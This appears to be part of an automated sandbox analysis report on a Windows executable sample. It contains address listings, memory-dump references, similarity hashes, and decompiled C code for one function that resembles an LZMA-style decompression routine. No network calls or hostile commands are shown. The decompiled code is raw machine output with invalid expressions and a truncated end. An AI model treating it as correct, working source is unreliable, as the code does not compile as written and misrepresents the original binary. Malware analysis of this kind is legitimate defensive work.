                                            0x00406800
                                            0x00406813
                                            0x00406816
                                            0x0040681f
                                            0x00406822
                                            0x0040684a
                                            0x0040684a
                                            0x0040684c
                                            0x0040685a
                                            0x0040685a
                                            0x0040685e
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0040684e
                                            0x0040684e
                                            0x00406851
                                            0x00406851
                                            0x00406852
                                            0x00406852
                                            0x00000000
                                            0x0040684e
                                            0x00406824
                                            0x00406828
                                            0x0040682d
                                            0x0040682d
                                            0x00406836
                                            0x0040683c
                                            0x0040683e
                                            0x00406841
                                            0x00000000
                                            0x00406847
                                            0x00406847
                                            0x00000000
                                            0x00406847
                                            0x00000000
                                            0x00406864
                                            0x00406864
                                            0x00406868
                                            0x00407114
                                            0x00000000
                                            0x00407114
                                            0x00406871
                                            0x00406881
                                            0x00406884
                                            0x00406887
                                            0x00406887
                                            0x00406887
                                            0x0040688a
                                            0x0040688a
                                            0x0040688e
                                            0x00000000
                                            0x00000000
                                            0x00406890
                                            0x00406893
                                            0x00406896
                                            0x004068c0
                                            0x004068c6
                                            0x004068cd
                                            0x00000000
                                            0x004068cd
                                            0x00406898
                                            0x0040689c
                                            0x0040689f
                                            0x004068a4
                                            0x004068a4
                                            0x004068af
                                            0x004068b5
                                            0x004068b7
                                            0x004068ba
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004068ff
                                            0x00406905
                                            0x00406908
                                            0x00406915
                                            0x0040691d
                                            0x00000000
                                            0x00000000
                                            0x004068d4
                                            0x004068d4
                                            0x004068d8
                                            0x00407123
                                            0x00000000
                                            0x00407123
                                            0x004068e4
                                            0x004068ef
                                            0x004068ef
                                            0x004068ef
                                            0x004068f2
                                            0x004068f5
                                            0x004068f8
                                            0x004068fb
                                            0x004068fd
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406f94
                                            0x00406f94
                                            0x00406f9a
                                            0x00406fa0
                                            0x00406fa3
                                            0x00406fa6
                                            0x00406fc0
                                            0x00406fc3
                                            0x00406fc9
                                            0x00406fd4
                                            0x00406fd4
                                            0x00406fd6
                                            0x00406fa8
                                            0x00406fa8
                                            0x00406fb7
                                            0x00406fbb
                                            0x00406fbb
                                            0x00406fd9
                                            0x00406fe0
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406fe2
                                            0x00406fe2
                                            0x00406fe6
                                            0x00407195
                                            0x00000000
                                            0x00407195
                                            0x00406ff2
                                            0x00406ff9
                                            0x00407001
                                            0x00407001
                                            0x00407001
                                            0x00407004
                                            0x00407007
                                            0x00407007
                                            0x00000000
                                            0x00000000
                                            0x00406925
                                            0x00406927
                                            0x0040692a
                                            0x0040699b
                                            0x0040699e
                                            0x004069a1
                                            0x004069a8
                                            0x004069b2
                                            0x00000000
                                            0x004069b2
                                            0x0040692c
                                            0x00406930
                                            0x00406933
                                            0x00406935
                                            0x00406938
                                            0x0040693b
                                            0x0040693d
                                            0x00406940
                                            0x00406942
                                            0x00406947
                                            0x0040694a
                                            0x0040694d
                                            0x00406951
                                            0x00406958
                                            0x0040695b
                                            0x00406962
                                            0x00406966
                                            0x0040696e
                                            0x0040696e
                                            0x0040696e
                                            0x00406968
                                            0x00406968
                                            0x00406968
                                            0x0040695d
                                            0x0040695d
                                            0x0040695d
                                            0x00406972
                                            0x00406975
                                            0x00406993
                                            0x00406995
                                            0x00000000
                                            0x00406995
                                            0x00406977
                                            0x0040697a
                                            0x0040697d
                                            0x00406980
                                            0x00406982
                                            0x00406982
                                            0x00406982
                                            0x00406985
                                            0x00406988
                                            0x0040698a
                                            0x0040698b
                                            0x0040698e
                                            0x00000000
                                            0x00000000
                                            0x00406bc4
                                            0x00406bc8
                                            0x00406be6
                                            0x00406be9
                                            0x00406bf0
                                            0x00406bf3
                                            0x00406bf6
                                            0x00406bf9
                                            0x00406bfc
                                            0x00406bff
                                            0x00406c01
                                            0x00406c08
                                            0x00406c09
                                            0x00406c0b
                                            0x00406c0e
                                            0x00406c11
                                            0x00406c14
                                            0x00406c14
                                            0x00406c19
                                            0x00000000
                                            0x00406c19
                                            0x00406bca
                                            0x00406bcd
                                            0x00406bd0
                                            0x00406bda
                                            0x00000000
                                            0x00000000
                                            0x00406c2e
                                            0x00406c32
                                            0x00406c55
                                            0x00406c58
                                            0x00406c5b
                                            0x00406c65
                                            0x00406c34
                                            0x00406c34
                                            0x00406c37
                                            0x00406c3a
                                            0x00406c3d
                                            0x00406c4a
                                            0x00406c4d
                                            0x00406c4d
                                            0x00000000
                                            0x00000000
                                            0x00406c71
                                            0x00406c75
                                            0x00000000
                                            0x00000000
                                            0x00406c7b
                                            0x00406c7f
                                            0x00000000
                                            0x00000000
                                            0x00406c85
                                            0x00406c87
                                            0x00406c8b
                                            0x00406c8b
                                            0x00406c8e
                                            0x00406c92
                                            0x00000000
                                            0x00000000
                                            0x00406ce2
                                            0x00406ce6
                                            0x00406ced
                                            0x00406cf0
                                            0x00406cf3
                                            0x00406cfd
                                            0x00000000
                                            0x00406cfd
                                            0x00406ce8
                                            0x00000000
                                            0x00000000
                                            0x00406d09
                                            0x00406d0d
                                            0x00406d14
                                            0x00406d17
                                            0x00406d1a
                                            0x00406d0f
                                            0x00406d0f
                                            0x00406d0f
                                            0x00406d1d
                                            0x00406d20
                                            0x00406d23
                                            0x00406d23
                                            0x00406d26
                                            0x00406d29
                                            0x00406d2c
                                            0x00406d2c
                                            0x00406d2f
                                            0x00406d36
                                            0x00406d3b
                                            0x00000000
                                            0x00000000
                                            0x00406dc9
                                            0x00406dc9
                                            0x00406dcd
                                            0x0040716b
                                            0x00000000
                                            0x0040716b
                                            0x00406dd3
                                            0x00406dd6
                                            0x00406dd9
                                            0x00406ddd
                                            0x00406de0
                                            0x00406de6
                                            0x00406de8
                                            0x00406de8
                                            0x00406de8
                                            0x00406deb
                                            0x00406dee
                                            0x00000000
                                            0x00000000
                                            0x004069be
                                            0x004069be
                                            0x004069c2
                                            0x0040712f
                                            0x00000000
                                            0x0040712f
                                            0x004069c8
                                            0x004069cb
                                            0x004069ce
                                            0x004069d2
                                            0x004069d5
                                            0x004069db
                                            0x004069dd
                                            0x004069dd
                                            0x004069dd
                                            0x004069e0
                                            0x004069e3
                                            0x004069e3
                                            0x004069e6
                                            0x004069e9
                                            0x00000000
                                            0x00000000
                                            0x004069ef
                                            0x004069f5
                                            0x00000000
                                            0x00000000
                                            0x004069fb
                                            0x004069fb
                                            0x004069ff
                                            0x00406a02
                                            0x00406a05
                                            0x00406a08
                                            0x00406a0b
                                            0x00406a0c
                                            0x00406a0f
                                            0x00406a11
                                            0x00406a17
                                            0x00406a1a
                                            0x00406a1d
                                            0x00406a20
                                            0x00406a23
                                            0x00406a26
                                            0x00406a29
                                            0x00406a45
                                            0x00406a48
                                            0x00406a4b
                                            0x00406a4e
                                            0x00406a55
                                            0x00406a59
                                            0x00406a5b
                                            0x00406a5f
                                            0x00406a2b
                                            0x00406a2b
                                            0x00406a2f
                                            0x00406a37
                                            0x00406a3c
                                            0x00406a3e
                                            0x00406a40
                                            0x00406a40
                                            0x00406a62
                                            0x00406a69
                                            0x00406a6c
                                            0x00000000
                                            0x00406a72
                                            0x00000000
                                            0x00406a72
                                            0x00000000
                                            0x00406a77
                                            0x00406a77
                                            0x00406a7b
                                            0x0040713b
                                            0x00000000
                                            0x0040713b
                                            0x00406a81
                                            0x00406a84
                                            0x00406a87
                                            0x00406a8b
                                            0x00406a8e
                                            0x00406a94
                                            0x00406a96
                                            0x00406a96
                                            0x00406a96
                                            0x00406a99
                                            0x00406a9c
                                            0x00406a9c
                                            0x00406a9c
                                            0x00406aa2
                                            0x00000000
                                            0x00000000
                                            0x00406aa4
                                            0x00406aa7
                                            0x00406aaa
                                            0x00406aad
                                            0x00406ab0
                                            0x00406ab3
                                            0x00406ab6
                                            0x00406ab9
                                            0x00406abc
                                            0x00406abf
                                            0x00406ac2
                                            0x00406ada
                                            0x00406add
                                            0x00406ae0
                                            0x00406ae3
                                            0x00406ae3
                                            0x00406ae6
                                            0x00406aea
                                            0x00406aec
                                            0x00406ac4
                                            0x00406ac4
                                            0x00406acc
                                            0x00406ad1
                                            0x00406ad3
                                            0x00406ad5
                                            0x00406ad5
                                            0x00406aef
                                            0x00406af6
                                            0x00406af9
                                            0x00000000
                                            0x00406afb
                                            0x00000000
                                            0x00406afb
                                            0x00406af9
                                            0x00406b00
                                            0x00406b00
                                            0x00406b00
                                            0x00406b00
                                            0x00000000
                                            0x00000000
                                            0x00406b3b
                                            0x00406b3b
                                            0x00406b3f
                                            0x00407147
                                            0x00000000
                                            0x00407147
                                            0x00406b45
                                            0x00406b48
                                            0x00406b4b
                                            0x00406b4f
                                            0x00406b52
                                            0x00406b58
                                            0x00406b5a
                                            0x00406b5a
                                            0x00406b5a
                                            0x00406b5d
                                            0x00406b60
                                            0x00406b60
                                            0x00406b66
                                            0x00406b04
                                            0x00406b04
                                            0x00406b07
                                            0x00000000
                                            0x00406b07
                                            0x00406b68
                                            0x00406b68
                                            0x00406b6b
                                            0x00406b6e
                                            0x00406b71
                                            0x00406b74
                                            0x00406b77
                                            0x00406b7a
                                            0x00406b7d
                                            0x00406b80
                                            0x00406b83
                                            0x00406b86
                                            0x00406b9e
                                            0x00406ba1
                                            0x00406ba4
                                            0x00406ba7
                                            0x00406ba7
                                            0x00406baa
                                            0x00406bae
                                            0x00406bb0
                                            0x00406b88
                                            0x00406b88
                                            0x00406b90
                                            0x00406b95
                                            0x00406b97
                                            0x00406b99
                                            0x00406b99
                                            0x00406bb3
                                            0x00406bba
                                            0x00406bbd
                                            0x00000000
                                            0x00406bbf
                                            0x00000000
                                            0x00406bbf
                                            0x00000000
                                            0x00406e4c
                                            0x00406e4c
                                            0x00406e50
                                            0x00407177
                                            0x00000000
                                            0x00407177
                                            0x00406e56
                                            0x00406e59
                                            0x00406e5c
                                            0x00406e60
                                            0x00406e63
                                            0x00406e69
                                            0x00406e6b
                                            0x00406e6b
                                            0x00406e6b
                                            0x00406e6e
                                            0x00000000
                                            0x00000000
                                            0x00406c1c
                                            0x00406c1c
                                            0x00406c1f
                                            0x00000000
                                            0x00000000
                                            0x00406f5b
                                            0x00406f5f
                                            0x00406f81
                                            0x00406f84
                                            0x00406f8e
                                            0x00406f91
                                            0x00406f91
                                            0x00000000
                                            0x00406f91
                                            0x00406f61
                                            0x00406f64
                                            0x00406f68
                                            0x00406f6b
                                            0x00406f6b
                                            0x00406f6e
                                            0x00000000
                                            0x00000000
                                            0x00407018
                                            0x0040701c
                                            0x0040703a
                                            0x0040703a
                                            0x0040703a
                                            0x00407041
                                            0x00407048
                                            0x0040704f
                                            0x0040704f
                                            0x00000000
                                            0x0040704f
                                            0x0040701e
                                            0x00407021
                                            0x00407024
                                            0x00407027
                                            0x0040702e
                                            0x00406f72
                                            0x00406f72
                                            0x00406f75
                                            0x00000000
                                            0x00000000
                                            0x00407109
                                            0x0040710c
                                            0x00000000
                                            0x00000000
                                            0x00406d43
                                            0x00406d45
                                            0x00406d4c
                                            0x00406d4d
                                            0x00406d4f
                                            0x00406d52
                                            0x00000000
                                            0x00000000
                                            0x00406d5a
                                            0x00406d5d
                                            0x00406d60
                                            0x00406d62
                                            0x00406d64
                                            0x00406d64
                                            0x00406d65
                                            0x00406d68
                                            0x00406d6f
                                            0x00406d72
                                            0x00406d80
                                            0x00000000
                                            0x00000000
                                            0x00407056
                                            0x00407056
                                            0x00407059
                                            0x00407060
                                            0x00000000
                                            0x00000000
                                            0x00407065
                                            0x00407065
                                            0x00407069
                                            0x004071a1
                                            0x00000000
                                            0x004071a1
                                            0x0040706f
                                            0x00407072
                                            0x00407075
                                            0x00407079
                                            0x0040707c
                                            0x00407082
                                            0x00407084
                                            0x00407084
                                            0x00407084
                                            0x00407087
                                            0x0040708a
                                            0x0040708a
                                            0x0040708a
                                            0x0040708a
                                            0x0040708d
                                            0x0040708d
                                            0x00407091
                                            0x004070f1
                                            0x004070f4
                                            0x004070f9
                                            0x004070fa
                                            0x004070fc
                                            0x004070fe
                                            0x00407101
                                            0x0040700d
                                            0x0040700d
                                            0x00000000
                                            0x0040700d
                                            0x00407093
                                            0x00407099
                                            0x0040709c
                                            0x0040709f
                                            0x004070a2
                                            0x004070a5
                                            0x004070a8
                                            0x004070ab
                                            0x004070ae
                                            0x004070b1
                                            0x004070b4
                                            0x004070cd
                                            0x004070d0
                                            0x004070d3
                                            0x004070d6
                                            0x004070da
                                            0x004070dc
                                            0x004070dc
                                            0x004070dd
                                            0x004070e0
                                            0x004070b6
                                            0x004070b6
                                            0x004070be
                                            0x004070c3
                                            0x004070c5
                                            0x004070c8
                                            0x004070c8
                                            0x004070e3
                                            0x004070ea
                                            0x00000000
                                            0x004070ec
                                            0x00000000
                                            0x004070ec
                                            0x00000000
                                            0x00406d88
                                            0x00406d8b
                                            0x00406dc1
                                            0x00406ef1
                                            0x00406ef1
                                            0x00406ef1
                                            0x00406ef1
                                            0x00406ef4
                                            0x00406ef4
                                            0x00406ef7
                                            0x00406ef9
                                            0x00407183
                                            0x00000000
                                            0x00407183
                                            0x00406eff
                                            0x00406f02
                                            0x00000000
                                            0x00000000
                                            0x00406f08
                                            0x00406f0c
                                            0x00406f0f
                                            0x00406f0f
                                            0x00406f0f
                                            0x00000000
                                            0x00406f0f
                                            0x00406d8d
                                            0x00406d8f
                                            0x00406d91
                                            0x00406d93
                                            0x00406d96
                                            0x00406d97
                                            0x00406d99
                                            0x00406d9b
                                            0x00406d9e
                                            0x00406da1
                                            0x00406db7
                                            0x00406dbc
                                            0x00406df4
                                            0x00406df4
                                            0x00406df8
                                            0x00406e24
                                            0x00406e26
                                            0x00406e2d
                                            0x00406e30
                                            0x00406e33
                                            0x00406e33
                                            0x00406e38
                                            0x00406e38
                                            0x00406e3a
                                            0x00406e3d
                                            0x00406e44
                                            0x00406e47
                                            0x00406e74
                                            0x00406e74
                                            0x00406e77
                                            0x00406e7a
                                            0x00406eee
                                            0x00406eee
                                            0x00406eee
                                            0x00000000
                                            0x00406eee
                                            0x00406e7c
                                            0x00406e82
                                            0x00406e85
                                            0x00406e88
                                            0x00406e8b
                                            0x00406e8e
                                            0x00406e91
                                            0x00406e94
                                            0x00406e97
                                            0x00406e9a
                                            0x00406e9d
                                            0x00406eb6
                                            0x00406eb8
                                            0x00406ebb
                                            0x00406ebc
                                            0x00406ebf
                                            0x00406ec1
                                            0x00406ec4
                                            0x00406ec6
                                            0x00406ec8
                                            0x00406ecb
                                            0x00406ecd
                                            0x00406ed0
                                            0x00406ed4
                                            0x00406ed6
                                            0x00406ed6
                                            0x00406ed7
                                            0x00406eda
                                            0x00406edd
                                            0x00406e9f
                                            0x00406e9f
                                            0x00406ea7
                                            0x00406eac
                                            0x00406eae
                                            0x00406eb1
                                            0x00406eb1
                                            0x00406ee0
                                            0x00406ee7
                                            0x00406e71
                                            0x00406e71
                                            0x00406e71
                                            0x00406e71
                                            0x00000000
                                            0x00406ee9
                                            0x00000000
                                            0x00406ee9
                                            0x00406ee7
                                            0x00406dfa
                                            0x00406dfd
                                            0x00406dff
                                            0x00406e02
                                            0x00406e05
                                            0x00406e08
                                            0x00406e0a
                                            0x00406e0d
                                            0x00406e10
                                            0x00406e10
                                            0x00406e13
                                            0x00406e13
                                            0x00406e16
                                            0x00406e1d
                                            0x00406df1
                                            0x00406df1
                                            0x00406df1
                                            0x00406df1
                                            0x00000000
                                            0x00406e1f
                                            0x00000000
                                            0x00406e1f
                                            0x00406e1d
                                            0x00406da3
                                            0x00406da6
                                            0x00406da8
                                            0x00406dab
                                            0x00000000
                                            0x00000000
                                            0x00406b0a
                                            0x00406b0a
                                            0x00406b0e
                                            0x00407153
                                            0x00000000
                                            0x00407153
                                            0x00406b14
                                            0x00406b17
                                            0x00406b1a
                                            0x00406b1d
                                            0x00406b20
                                            0x00406b23
                                            0x00406b26
                                            0x00406b28
                                            0x00406b2b
                                            0x00406b2e
                                            0x00406b31
                                            0x00406b33
                                            0x00406b33
                                            0x00406b33
                                            0x00000000
                                            0x00000000
                                            0x00406c95
                                            0x00406c95
                                            0x00406c99
                                            0x0040715f
                                            0x00000000
                                            0x0040715f
                                            0x00406c9f
                                            0x00406ca2
                                            0x00406ca5
                                            0x00406ca8
                                            0x00406caa
                                            0x00406caa
                                            0x00406caa
                                            0x00406cad
                                            0x00406cb0
                                            0x00406cb3
                                            0x00406cb6
                                            0x00406cb9
                                            0x00406cbc
                                            0x00406cbd
                                            0x00406cbf
                                            0x00406cbf
                                            0x00406cbf
                                            0x00406cc2
                                            0x00406cc5
                                            0x00406cc8
                                            0x00406ccb
                                            0x00406ccb
                                            0x00406ccb
                                            0x00406cce
                                            0x00406cd0
                                            0x00406cd0
                                            0x00000000
                                            0x00000000
                                            0x00406f12
                                            0x00406f12
                                            0x00406f12
                                            0x00406f16
                                            0x00000000
                                            0x00000000
                                            0x00406f1c
                                            0x00406f1f
                                            0x00406f22
                                            0x00406f25
                                            0x00406f27
                                            0x00406f27
                                            0x00406f27
                                            0x00406f2a
                                            0x00406f2d
                                            0x00406f30
                                            0x00406f33
                                            0x00406f36
                                            0x00406f39
                                            0x00406f3a
                                            0x00406f3c
                                            0x00406f3c
                                            0x00406f3c
                                            0x00406f3f
                                            0x00406f42
                                            0x00406f45
                                            0x00406f48
                                            0x00406f4b
                                            0x00406f4f
                                            0x00406f51
                                            0x00406f54
                                            0x00000000
                                            0x00406f56
                                            0x00406cd3
                                            0x00406cd3
                                            0x00000000
                                            0x00406cd3
                                            0x00406f54
                                            0x00407189
                                            0x004071ab
                                            0x004071b1
                                            0x004071b3
                                            0x004071ba
                                            0x00000000
                                            0x00000000
                                            0x004067b8
                                            0x004071c0
                                            0x004071c0
                                            0x00000000

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661113502.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.661110204.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661119046.0000000000408000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661122918.000000000040A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661128357.0000000000413000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661135352.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661139040.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661143205.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4d3c90e2c2c281b0151b8bc02d48c609eaff53916cbf358625803cc36882de51
                                            • Instruction ID: 8282c7973928a3a8991f4aebeb421c6794774a39cdfa424cdd26f1de73b17733
                                            • Opcode Fuzzy Hash: 4d3c90e2c2c281b0151b8bc02d48c609eaff53916cbf358625803cc36882de51
                                            • Instruction Fuzzy Hash: 74816571D14228DBDF28CFA8C844BADBBB1FB44305F14816AD856BB2C1C7786A86DF45
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00406BC4, Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 98%
                                            			E00406BC4() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M004071C8))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
